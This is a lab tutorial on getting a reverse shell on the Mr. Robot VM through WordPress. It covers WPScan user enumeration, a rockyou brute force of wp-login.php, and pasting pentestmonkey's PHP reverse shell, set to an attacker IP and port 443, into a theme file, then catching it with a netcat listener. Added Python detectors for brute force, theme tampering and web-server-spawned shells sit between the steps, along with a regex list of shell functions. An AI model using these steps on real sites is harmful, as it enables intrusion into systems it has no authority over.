This tutorial demonstrates obtaining a reverse shell on a host through WordPress by editing a theme file. The technique is useful in many CTF events and is often found in the wild.
For this walkthrough, the WordPress installation on the Mr. Robot VM is used, with a WordPress admin account added for simplicity. Complete walkthroughs for Mr. Robot can be found in many places (possibly on pentaROOT.com someday in the future), but this tutorial focuses specifically on obtaining a reverse shell through WordPress themes.
Software
- WordPress Installation
- WPScan
- php-reverse-shell (pentestmonkey)
- also located at /usr/share/webshells/php/php-reverse-shell.php on Kali
Install WPScan
- Included in Kali Linux
- If not currently installed on your distro:
- $ sudo apt-get update
- Install dependencies:
- $ sudo apt install curl git libcurl4-openssl-dev make zlib1g-dev gawk g++ gcc libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 autoconf libgdbm-dev libncurses5-dev automake libtool bison pkg-config ruby ruby-bundler ruby-dev -y
- $ git clone https://github.com/wpscanteam/wpscan.git
- $ cd wpscan
- $ bundle install --without test
- $ ruby wpscan.rb --update
- When installed from source this way, run WPScan from the wpscan folder as ruby wpscan.rb <options> instead of wpscan <options>.
- To run a basic scan with no extra options:
- $ sudo wpscan --url https://wordpress_example.com
- $ sudo wpscan --url 192.168.189.142
Brute Force wp-login.php
In a browser, navigate to the /wp-login.php of your target.
The first step in brute forcing WordPress is to enumerate users. WPScan has this feature built in already, so let’s run it.
- $ sudo wpscan --url 192.168.189.142 --enumerate u
Depending on the version of WordPress, you may also use the wp-login.php login form to enumerate users. Enter a username with any password: the ERROR message differs depending on whether the username exists, which gives valid usernames away.
So there is a user named admin, but not administrator. Let's use WPScan to brute force the admin password.
- $ wpscan --url 192.168.189.142 --wordlist /usr/share/wordlists/rockyou.txt --username admin
Success! admin:peaches
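For the defender's side of the two steps above (author-ID enumeration and the wp-login.php brute force), here is an added example that is not part of the original tutorial and not WPScan's code: a small detector run over web server access-log lines. It assumes the Apache/nginx combined log format; the log lines are constructed samples, the thresholds are assumptions made for this example, and so is the heuristic that a failed wp-login.php POST is answered with 200 (the login form re-rendered with an error) while a successful one is answered with a 302 redirect.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# /?author=N probes walk user IDs; WordPress redirects to /author/<login>/ when the ID exists.
AUTHOR_RE = re.compile(r'^/\?author=\d+$')

# Constructed sample traffic (not real log data): one client enumerates users, then hammers
# wp-login.php and finally receives a 302; a second client logs in normally once.
ATTACKER = "192.168.189.135"
SAMPLE_LOG = "\n".join(
    [f'{ATTACKER} - - [10/Mar/2024:10:00:01 +0000] "GET /?author={i} HTTP/1.1" {301 if i == 1 else 404} 0 "-" "curl/8.0"'
     for i in (1, 2, 3)]
    + [f'{ATTACKER} - - [10/Mar/2024:10:00:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "curl/8.0"']
    + [f'{ATTACKER} - - [10/Mar/2024:10:00:{10 + i // 10:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "curl/8.0"'
       for i in range(40)]
    + [f'{ATTACKER} - - [10/Mar/2024:10:00:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/8.0"']
    + ['10.0.0.7 - - [10/Mar/2024:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
       '10.0.0.7 - - [10/Mar/2024:10:01:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"']
)


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            events.append(e)
    return events


def detect_wp_recon(events, author_threshold=3, login_threshold=20):
    """Per-client-IP findings for the enumeration and brute-force steps.

    Heuristics (assumptions for this example):
    - user enumeration: >= author_threshold distinct /?author=N probes, or any request to /wp-json/wp/v2/users
    - login brute force: >= login_threshold POSTs to wp-login.php answered with 200 (the form re-rendered
      with an error); a 302 from the same IP after that many failures is the redirect WordPress sends
      on success, so it is reported as a probable compromised account.
    """
    author_ids, rest_users = defaultdict(set), set()
    failed, succeeded = defaultdict(int), set()
    for e in events:
        path = e["path"]
        if AUTHOR_RE.match(path):
            author_ids[e["ip"]].add(path)
        elif path.startswith("/wp-json/wp/v2/users"):
            rest_users.add(e["ip"])
        elif e["method"] == "POST" and path.split("?", 1)[0] == "/wp-login.php":
            if e["status"] == 200:
                failed[e["ip"]] += 1
            elif e["status"] == 302 and failed[e["ip"]] >= login_threshold:
                succeeded.add(e["ip"])
    enum_ips = {ip for ip, ids in author_ids.items() if len(ids) >= author_threshold} | rest_users
    return {
        "user_enumeration": sorted(enum_ips),
        "login_bruteforce": {ip: n for ip, n in failed.items() if n >= login_threshold},
        "bruteforce_success": sorted(succeeded),
    }


if __name__ == "__main__":
    for key, value in detect_wp_recon(parse_log(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

The order matters in the success check: a single 302 from a client with no prior failures (the second client in the sample) is a normal login, while a 302 arriving after dozens of 200s from the same address is the signal worth paging on. On a real server, feed it the access log and tune the thresholds to the site's normal login volume.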
Insert Reverse Shell Into WordPress Theme
Once you have credentials, log in to wp-login.php and navigate to the theme editor.
- Appearance > Editor
Take note of the current theme being edited. For this tutorial, we are editing the ‘Twenty Thirteen’ theme. Underneath the Templates sidebar, there are multiple files, including *.css, *.php, and possibly others. As our reverse shell is written in PHP, let’s target a PHP file. The archive.php file is typically a good one to use.
Delete all the text in the archive.php file and replace it with the contents of the PHP reverse shell.
- Included on Kali at /usr/share/webshells/php/php-reverse-shell.php
- Direct from PentestMonkey
- $ wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
- $ tar -xzf php-reverse-shell-1.0.tar.gz
- $ cat php-reverse-shell-1.0/php-reverse-shell.php
Update the following lines in the PHP script to your attacker IP address and the port you wish to connect on:
- Default
- $ip = '127.0.0.1'; // CHANGE THIS
- $port = 1234; // CHANGE THIS
- Updated
- $ip = '192.168.189.135';
- $port = 443;
You may find your IP address by entering one of the following commands in a terminal on your attacker device (typically the inet address under eth0):
- $ sudo ifconfig
- $ sudo ip a
Click on the ‘Update File’ button at the bottom of the script to save your changes. If the file was saved correctly, the ‘File edited successfully’ notification will display above the code.
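The edit just made is exactly what a file-integrity check on the theme directory is meant to catch. The following is an added example, not code from the original tutorial: it hashes every file under a theme directory, diffs the result against a baseline taken when the theme was known-good, and scans the changed PHP files for functions a template has no reason to call. The demo builds a throwaway theme directory in a temp folder and the "tampered" archive.php is a constructed stand-in that only names such functions; the indicator list and the demo file contents are assumptions for this example.

```python
import hashlib
import os
import re
import tempfile

# PHP functions a theme template has no business calling; any hit in a changed file deserves a look.
# (indicator list chosen for this example, not exhaustive)
INDICATOR_RE = re.compile(r'\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|eval)\s*\(')


def hash_tree(theme_dir):
    """Map each file's path (relative to theme_dir) to its SHA-256 hex digest."""
    digests = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, theme_dir)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Compare two hash_tree() results: which files changed, appeared, or disappeared."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def scan_indicators(theme_dir, paths=None):
    """Return {relative path: [matched function names]} for PHP files calling indicator functions."""
    hits = {}
    targets = paths if paths is not None else hash_tree(theme_dir).keys()
    for rel in targets:
        if not rel.endswith(".php"):
            continue
        with open(os.path.join(theme_dir, rel), "r", encoding="utf-8", errors="replace") as fh:
            found = sorted(set(INDICATOR_RE.findall(fh.read())))
        if found:
            hits[rel] = found
    return hits


def build_demo_theme():
    """Create a tiny constructed theme directory (stand-in for wp-content/themes/<theme-name>)."""
    theme_dir = tempfile.mkdtemp(prefix="theme-")
    files = {
        "style.css": "/* Theme Name: Demo */\n",
        "index.php": "<?php get_header(); ?>\n",
        "archive.php": "<?php get_header(); get_template_part('content'); get_footer(); ?>\n",
    }
    for rel, body in files.items():
        with open(os.path.join(theme_dir, rel), "w") as fh:
            fh.write(body)
    return theme_dir


def tamper_archive(theme_dir):
    """Overwrite archive.php as the theme-editor step does; the body is a constructed stand-in
    that merely names the functions a PHP reverse shell relies on, not a working shell."""
    with open(os.path.join(theme_dir, "archive.php"), "w") as fh:
        fh.write("<?php\n$s = fsockopen($host, $port);\n$p = proc_open($cmd, $spec, $pipes);\n")


def demo():
    theme_dir = build_demo_theme()
    baseline = hash_tree(theme_dir)  # take this while the theme is known-good
    tamper_archive(theme_dir)
    changes = diff_baseline(baseline, hash_tree(theme_dir))
    indicators = scan_indicators(theme_dir, changes["modified"] + changes["added"])
    return changes, indicators


if __name__ == "__main__":
    print(demo())
```

Store the baseline outside the web root (the attacker who can edit archive.php can edit a baseline that sits next to it), and re-run the comparison on a schedule. Setting DISALLOW_FILE_EDIT in wp-config.php removes the theme editor that this tutorial relies on, which is the cheaper fix when nobody needs it.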
Connect to the Reverse Shell
In a terminal, start a netcat listener on the port specified in the PHP reverse shell script.
- $ sudo nc -nvlp 443
In a new tab on your browser, navigate to the updated archive.php page using the following template:
- http://<url-or-ip>/wp-content/themes/<theme-name>/archive.php
- http://192.168.189.142/wp-content/themes/twentythirteen/archive.php
Success! We now have a reverse shell as a low privilege user.
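What the defender sees at this point is a shell running as the web server's low-privilege user, with the web server process as its parent. As an added example (not part of the original tutorial), here is the classic detection for that: parse a process listing, walk each shell's ancestry, and flag any shell that descends from a web server process. It assumes the column layout of `ps -eo pid,ppid,user,comm`; the process snapshot is constructed, and the sets of web-server and shell command names are assumptions for this example.

```python
# Command names treated as web servers / PHP workers and as interactive shells or shell-like tools.
# (assumed lists for this example; extend for your environment)
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm", "php-fpm8.2"}
SHELLS = {"sh", "bash", "dash", "zsh", "nc", "ncat", "socat", "python3", "perl"}

# Constructed snapshot in `ps -eo pid,ppid,user,comm` layout (not from a real host):
# an apache2 worker has spawned sh, which spawned bash; an ssh session's bash is benign.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     systemd
  800     1 root     apache2
  801   800 www-data apache2
  802   800 www-data apache2
 1332   802 www-data sh
 1340  1332 www-data bash
 1401     1 mysql    mysqld
 1500     1 root     sshd
 1510  1500 robot    bash
"""


def parse_ps(text):
    """Parse `ps -eo pid,ppid,user,comm` output into {pid: {"ppid", "user", "comm"}}."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4 or not parts[0].isdigit():
            continue  # header or malformed line
        pid, ppid, user, comm = parts
        procs[int(pid)] = {"ppid": int(ppid), "user": user, "comm": comm}
    return procs


def ancestry(procs, pid):
    """Return [pid, parent, grandparent, ...] up to the root, guarding against cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def find_webserver_shells(procs):
    """Flag every shell whose ancestry passes through a web server process."""
    findings = []
    for pid, p in procs.items():
        if p["comm"] not in SHELLS:
            continue
        chain = ancestry(procs, pid)
        web = next((a for a in chain[1:] if procs[a]["comm"] in WEB_SERVERS), None)
        if web is None:
            continue
        findings.append({
            "pid": pid,
            "comm": p["comm"],
            "user": p["user"],
            "web_pid": web,
            "chain": " -> ".join(procs[a]["comm"] for a in reversed(chain)),
        })
    return sorted(findings, key=lambda f: f["pid"])


if __name__ == "__main__":
    for f in find_webserver_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {f['pid']} ({f['comm']}, user {f['user']}) under web pid {f['web_pid']}: {f['chain']}")
```

The ancestry walk, rather than a direct parent check, is what catches the second hop (bash under sh under apache2). Run it from cron or feed the same rule to an EDR; a shell whose lineage goes through apache2 or php-fpm is rare enough on a production host that each hit is worth an immediate look.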
On Your Own
Obtaining a low privilege shell is the first step, but escalating to root or admin privileges gives you the keys to the kingdom. We will have additional posts in the future to cover privilege escalation, but see what you can find on your own. A great place to start is exploit-db.